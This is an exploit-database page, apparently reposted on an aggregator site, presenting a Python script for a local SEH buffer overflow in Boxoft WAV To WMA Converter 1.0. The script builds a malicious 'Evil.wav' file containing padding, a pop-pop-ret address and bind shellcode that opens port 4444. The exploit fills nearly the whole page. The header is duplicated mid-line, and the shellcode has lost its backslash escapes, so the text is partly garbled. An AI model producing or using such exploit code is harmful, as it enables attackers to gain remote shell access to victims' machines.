Get Rid of Ads!

Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Boxoft WAV To WMA Converter 1.0 Buffer Overflow

Details
Category: Vulnerabilities
Hits: 483
# Exploit Title: Boxoft wav-wma Converter - Local Buffer Overflow (SEH)
# Date: 2018-07-08
# Software Link: http://www.boxoft.com/wav-to-wma/
# Software Version:1.0
# Exploit Aut # Exploit Title: Boxoft wav-wma Converter - Local Buffer Overflow (SEH)
# Date: 2018-07-08
# Software Link: http://www.boxoft.com/wav-to-wma/
# Software Version:1.0
# Exploit Author: Achilles
# Target: Windows 7 x64
# CVE:
# Description: A malicious .wav file cause this vulnerability.
# Category: Local Exploit

buffer = "A" * 4132
buffer+= "x90x90xebx06" #jmp short 6
buffer+= "x34x14x40x00" # pop pop retn
buffer+= "x90" * 20
buffer+= ("xdaxd5xb8x9bx69x4dxa1xd9x74x24xf4x5ax33" #Bind shellcode port 4444
"xc9xb1x60x83xc2x04x31x42x15x03x42x15x79"
"x9cxf2x9bx0cxb0x35x05x03x97x32x91x2fx75"
"x92x10x7exdfxd5xdfx95x63xd0x24x96x1exca"
"xc6x57x4bxd9xe7x3cxe4x1cxa0xd9x7ex72xe4"
"x38x26xd1x92x88x79x63x55xe3x94xfex9axac"
"xb5xdexe4x35xbcxd0x9fxe6x92x63x51x5axaf"
"xadx1bxb0xf9x6ex46xacx68xa9x48xcexb8xe1"
"xd2xf5x1ax7dx84xdexb9x55xa0xe8xe3xd8xb2"
"x31xfbx1ax0bxeaxedxf4x8fxddxf5x55xbfx1a"
"xa5xe8xd8xfaxdex45x11x7cx4dxeax87x0fx9f"
"xe5xdfx90x18x7ex52x1bxd7x24x22xabx1bxda"
"x31xa2x75x8fxa3x13x99x20x5ex07x57x68x3e"
"x10xc7xc2xb0x2bxa0x13xd6x6ax3exc3x1ex99"
"x4fxf0xcex63x50xe3x90x80x3ex0ex9cx39x7e"
"x48xe6xf0xe7x3bxd3x7dxe3xa3x62x41xeex19"
"xd0xa8xc9xdbx02x93x0fx34xb0xadx81x08x57"
"xcexb8x38xfex13xc9xe7x40xc2x17xa6x3ax4c"
"x06x31xfcx3fx8fxcbx85x84x74x98x9cx63xe5"
"x46x2fxfcx15x3bx5cx37xd3x36xfcx39x3cx86"
"x29x32xbbxb3x04x13x6axd1xa7x55xacx8exa8"
"x05xafxc3xaex9dxc6x5fxa8x9dx8ex4ax25x3a"
"x35xa3xd7x4cxaaxb1x87xcax54x6dxdcxb2xf3"
"x3axaax29xeax44x01x4exb0x08x9axd0xb5x69"
"x42xe5xb4x5fx59xffxb4x90xe2x97x66x09x89"
"x87x8exffxa8x21x68x3fx01xe9xb3x27x63xd2"
"x93x2fx4dx9cx28x21xd4x9dxadx8fx24x19xc9"
"x98xbcx24x0bx47x84x9cx57xd2x20x79x71x67"
"xe0xd1xcdx40x51x7dxe2x39xa9xd2x92x4cx24"
"x59x7bxfdx89x6exeaxecxc8xacx54x8ax26x60"
"x81x38x06x32xabx56x1cxe7xd0x78xe5xa2x75"
"xc8x28x1bxd5x3fx51")

try:
f=open("Evil.wav","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"